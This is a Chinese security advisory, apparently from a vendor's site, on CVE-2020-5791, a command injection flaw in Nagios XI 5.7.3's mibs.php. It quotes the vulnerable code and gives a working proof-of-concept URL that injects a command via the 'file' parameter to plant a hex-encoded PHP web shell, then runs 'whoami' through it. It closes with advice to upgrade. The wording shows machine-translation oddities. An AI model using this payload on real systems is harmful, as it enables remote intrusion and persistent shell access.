GA黄金甲

首页 > 安全钻研 > 安全传递 > 安全公告

CVE-2020-5791 | Nagios XI远程代码执行缝隙公告

颁布功夫 2020-10-28

0x00 缝隙概述

CNVD ID	CVE-2020-5791	时间	2020-10-28
类型	RCE	等级	高危
远程利用	是	影响领域	Nagios XI 5.7.3

Nagios XI是一个成立在Nagios主题上的企业级监测和报警规划的开源组件。职能蕴含PHP网站界面、综合阐发图、可定造的仪表板、网络结构、配置GUI(图形用户接口)、用户治理等。

0x01 缝隙详情

2020年10月15日，Nagios开发团队颁布安全布告称Nagios XI 5.7.3中存在多个安全缝隙，其中较为严沉的是一个远程代码执行缝隙（CVE-2020-5791），其CVSS评分7.2。

该缝隙存在于/nagiosxi/admin/mibs.php文件中。攻击者可能利用此缝隙以“apache”用户执行肆意号令。具体来说，当HTTP参数“mode”蹬宗“undo-processing”并且“type”参数蹬宗1时，“file”参数最终将被传递给PHP exec（）函数，而不需进行算帐。以下代码显示了这一点:

function route_request()

{

global $request;

$mode = '';

if (isset($request['mode'])) {

$mode = $request['mode'];

}

switch ($mode) {

...

case 'undo-processing':

undo_process_single(); // VULN

break;

...

}

...

}

function undo_process_single() {

// Mode needs to be based on processing type of MIB, not on 'current' processing type

$file = grab_request_var('file', '');

$name = grab_request_var('name', '');

$current_type = intval(grab_request_var('type', MIB_UPLOAD_DO_NOTHING));

if ($current_type !== MIB_UPLOAD_PROCESS_ONLY && $current_type !== MIB_UPLOAD_NXTI) {

show_mibs(false, _("No processing to be undone"));

}

undo_processing($file, $name, $current_type); // VULN

show_mibs(false, sprintf(_("Successfully reverted %s to 'uploaded' state"), $name));

}

function undo_processing($file, $name, $current_type) {

if ($current_type !== MIB_UPLOAD_PROCESS_ONLY && $current_type !== MIB_UPLOAD_NXTI) {

return;

}

$current_conf_path = get_processing_destination($current_type) . '/' . $file;

remove_snmpttconvertmib_files(array($file));

if ($current_type === MIB_UPLOAD_PROCESS_ONLY) {

$get_event_names_cmd = get_root_dir() . "/scripts/nxti_import.php $current_conf_path --no-insert";

exec($get_event_names_cmd, $all_events, $rc); // VULN

$all_events = array_unique($all_events);

remove_from_snmptt_conf($all_events);

}

mibs_revert_db_entry($name);

}

此缝隙的POC如下：

攻击者将以下链接发送给Nagios XI治理员：

http://192.168.x.x/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file=%3becho+-ne+"\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e">/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/scooby.php

治理员单击链接后，将创建scooby.php文件，攻击者能够接见新创建的PHP脚正本执行更多号令。

http://192.168.x.x/nagiosxi/includes/components/autodiscovery/jobs/scooby.php?cmd=whoami

把稳响应中的“apache”：

HTTP/1.1 200 OK

Date: Thu, 24 Sep 2020 21:09:56 GMT

Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16

X-Powered-By: PHP/5.4.16

Content-Length: 19

Connection: close

Content-Type: text/html; charset=UTF-8

apache

--no-insert

0x02 措置建议

升级到最新版本。

下载链接：

https://www.nagios.com/downloads/nagios-xi/

0x03 参考链接

https://www.nagios.com/products/security/

https://www.nagios.com/downloads/nagios-xi/change-log/

https://zh-cn.tenable.com/security/research/tra-2020-58?tns_redirect=true

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5791

0x04 功夫线

2020-10-15 Nagios颁布安全布告

2020-10-28 VSRC颁布安全公告

0x05 附录

CVSS评分尺度官网：http://www.first.org/cvss/

上一篇下一篇

7*24幼时服务热线

400-624-3900

+86(10)56631988(港澳专线)

04152424g9z1

官方微信

12145445s033

官方微博

网御星云合多数据书生电子云子可信

司法申明

Copyright ? GA黄金甲版权所有京ICP备05032414号京公网安备11010802024551号

【网站地图】